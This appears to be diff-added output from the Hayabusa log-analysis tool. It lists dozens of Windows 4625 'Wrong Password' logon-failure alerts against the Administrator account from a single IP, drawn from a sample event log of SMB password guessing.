+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9Q2GSALfiuEbulo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DKTja76Qe9vSjrdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXuUyKlvaOgMNSu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X3qdEQReXwHAZUS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqtfHJKOfmWXEd4s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVv7vete3uXixggi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0PF6E3wRP0Tk39ss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: touwF4IXUahG7jvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lMOi7rygc7SJ5TPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QjM1K5eFSA9U37oE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HgzyZqFU9v2kDVvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hJeVj2h0sBxwBuGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FNXI8b6Zcj1zU3JY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9DyH9oxFbRTCQ80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5LZo1ljGLOVKhwcC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvY6Q7RGKwjehARC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uKLrHVMevqniTck8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldxglvKFhLJQ3FV3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRHIAxIj9wFRIg67  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mc7nvfyDfWpnhhBx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB7Y4gPbxose5TsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yKFU6DJ8Wdtp2qdC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YlbxRctdClWIOjss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LToi5ANf3tUteu4h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 52YPmYviVPBqJ39Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JpzKsyxEKNLd8l1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0vd6xEFevamX3jF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WR9gJBoN1ra4NI2M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGYNVrDBIpMBu9GT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 57qCysbeaXx12CbY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyJl4mHvgtTv53d9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGBDZCtot2ogcKIO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bBhmbqZIi1gX62mM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o7d4bcBJV1jlRgdt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtfFb6hMHJiFXxai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frlsZMDcdb5WaW99  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CFV8UiUTRCCfab9l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZI8P6ZeVRmQlbGtz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmJI7S1nj5hfWZqv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: veh8XInSzXe8E9UD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1BuBHLILZ4afwJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NN2h7CHnGSCQZXan  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BU3fxfM1qGBJ55HS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1OlBmhUABabDQbN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DgQtHG7cT05kRXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUTe3JqVWgDcDcOS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nGKgUOyX3USQlESB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcIJ8keQvgax1SuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A7jsyA7bWtVf4sLr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mijnM28fwbgWzkvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dNmJo7vkacqxA6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FxvD2OWtadDT1Q2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK8Esc50KVWIsLU5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U07NeCzXSdx5Nlgs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tObVl72GJse2HCGp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nbEnp2E5a3N78OBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlRmyinJLWwj5yQg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92H7tdXinUOxtOLV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Za42EUNuitIXaMBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kz7OtswOreS0fdeS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VMxY1IHx5VuvskM7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d6uxMqLCcqHkuesV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TmeAWYvFEbqJp1rt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tGAdT1CBRYRatVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0h9ulMPWtj8bEKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eLyLMNv6cOp3sgrq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIAOs16X8nFxV45x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z4EbyEaUxUEyuiY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDnW5GABBLbe6eZ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GublgQLD3RXQNmkX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BQRppHTUHAoWPe4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gnh6HFlIW1zWEBu5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
